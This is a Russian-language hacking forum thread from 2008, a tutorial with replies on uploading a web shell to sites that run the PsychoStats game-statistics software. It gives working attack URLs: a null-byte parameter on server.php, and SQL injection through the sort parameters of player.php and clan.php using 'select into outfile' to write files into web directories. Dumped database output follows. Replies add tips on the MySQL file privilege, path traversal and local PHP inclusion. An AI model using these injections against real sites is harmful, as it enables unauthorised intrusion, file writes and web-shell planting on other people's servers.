![]() |
Заливаем шелл через PsychoStats
Здравствуйте, предлагаю Вашему вниманию статью про то, как залить шелл на сайт через игровую статистику PsychoStats.
Статья, по-существу, является описанием к видео . Главной проблемой в заливке шелла через эту игровую статистику является нахождение пути к папке с правами на запись. Если Вы нашли сайт с такой статой и нашли полный путь к папке с определёнными правами, тогда вам повезло и можно залить шелл :) И так, по шагам... Сперва мне пришла в голову идея как-либо полезно воспользоваться паблик "сплойтом" для этой игровой статы... Код:
http://www.example.com/[path]/server.php?newcss=styles.css&newtheme=%00Код:
/player.php?id=1093&ssort=(-skill*1)&sorder=desc#plrsessionsКод:
/player.php?id=1093&ssort=(-skill*(select 1))&sorder=desc#plrsessionsКод:
/player.php?id=1093&ssort=(-skill*(select 1 into outfile '/path/file.txt'))&sorder=desc#plrsessionsКод:
1191849001 1191849415 7405.11 4 4 1.00 2 50.00 0 0 0.00 0 0.00 593 53 11 13.25 20.75 0 414Код:
/clan.php?id=3&psort=(-deaths*(select 1 into outfile 'd:/system/server/www/info/inet2/2.txt'))&porder=descКод:
1093 1093 2007-04-06 2007-09-30 21.24 0 11 8 72.73 36 90.00 40 2.91 28 2.04 308 0 82 377 314 374 333 29.50 88582 607 16 6 0.99 5 0.86 76 0 172 29.45 2284 0 0 0 0 31 584 25 0.96 0.72 1191141416 48366 3 25.00 1373 10751 18.41 3 580 617 495 796 70.50 117 12 0 0 0 1093 167840198 1175835726 3 1 2 7136.22 10000.00 1198267271 1 167840198 \N [@_oFF_D]~TURIK.<awp>~ 0 \N \NС наилучшими пожеланиями, FoST 8(тире)794(тире)038 (с) FoST 08.01.2008, 23:00 Статья впервые опубликована здесь на ачате. |
можно и проще сделать,
Цитата:
непробовал но скорее всего можно, причем нужно конечно иметь file_priv пользователя мускула |
будет работать если у юзера есть файл прив, а вообще интересно)
|
Цитата:
|
А есть ещё статьи по взлому этой Психостаты?
|
NAT_uu, хз может и есть =)
|
Цитата:
|
Обязательно указывать полный путь до папки с правами? Ведь на всех статистиках возможна запись в папку /images , /images/maps/ . Может можно просто
Код:
/player.php?id=1093&ssort=(-skill*(select 1 into outfile '/images/file.txt'))&sorder=desc#plrsessions |
обязательно полный путь, если путь вобще не указывать, то он зальет в текущую папку, т.е. в ту где хранятся файлы базы данных, а они из веба недоступны т.е. поумалчанию файлы заливаются в папку с файлами базы данных
|
Можно попробовать через текущую папку
outfile './../../..path/file.txt') ..path=путь к дире доступной для чтения извне. Но там придётся или подбирать этот самый путь или же использовать заранее найденную локальную php-inj. |
| Время: 23:08 |